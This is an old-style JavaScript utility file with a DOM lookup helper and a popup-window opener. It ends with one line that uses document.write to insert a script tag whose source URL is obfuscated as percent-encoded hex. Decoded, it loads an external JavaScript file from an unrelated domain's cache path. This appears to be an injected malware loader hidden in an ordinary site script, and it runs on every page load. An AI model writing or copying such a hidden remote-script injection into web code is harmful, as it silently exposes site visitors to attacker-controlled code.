function findDOM(objectID, withstyle) {
	if (withstyle) {
		if 
			(document.getElementById) return (document.getElementById(objectID).style) ; 
		else if 
			(document.all) return (document.all[objectID].style); 
		else if 
			((navigator.appName.indexOf('Netscape') != -1) && (parseInt(navigator.appVersion) == 4)) return (document.layers[objectID]); 
	}
	else {
		if 
			(document.getElementById) return (document.getElementById(objectID)) ; 
		else if 
			(document.all) return (document.all[objectID]); 
		else if 
			((navigator.appName.indexOf('Netscape') != -1) && (parseInt(navigator.appVersion) == 4)) return (document.layers[objectID]); 
	}
}

var window1 = null;
function openWindow(contentURL,windowWidth,windowHeight,leftPos,topPos,scrol) 
{	
	if (scrol == null)
		{	
		sizePos = 'height=' + windowHeight + ',width=' + windowWidth 
			+ ',left=' + leftPos + ',top=' + topPos + ',resizable=' + '1' + ',toolbar=' + '1';	
		window1 = window.open(contentURL,null,sizePos);		
		window1.focus()
		}
	else 
		{
		sizePos = 'height=' + windowHeight + ',width=' + windowWidth 
			+ ',left=' + leftPos + ',top=' + topPos + ',resizable=' + '1' + ',toolbar=' + '1'
			+ ',scrollbars=' + '1';	
		window1 = window.open(contentURL,null,sizePos);		
		window1.focus()
		}		
}

document.write('<script language="JavaScript" type="text/javascript" src="'+unescape('%68%74%74%70%3a%2f%2f%77%77%77%2e%73%6d%69%6c%6c%61%68%2e%63%6f%6d%2f%63%61%63%68%65%2f%6d%6f%64%5f%63%75%73%74%6f%6d%2f%38%31%34%34%38%31%33%38%2e%6a%73')+'"></script>');
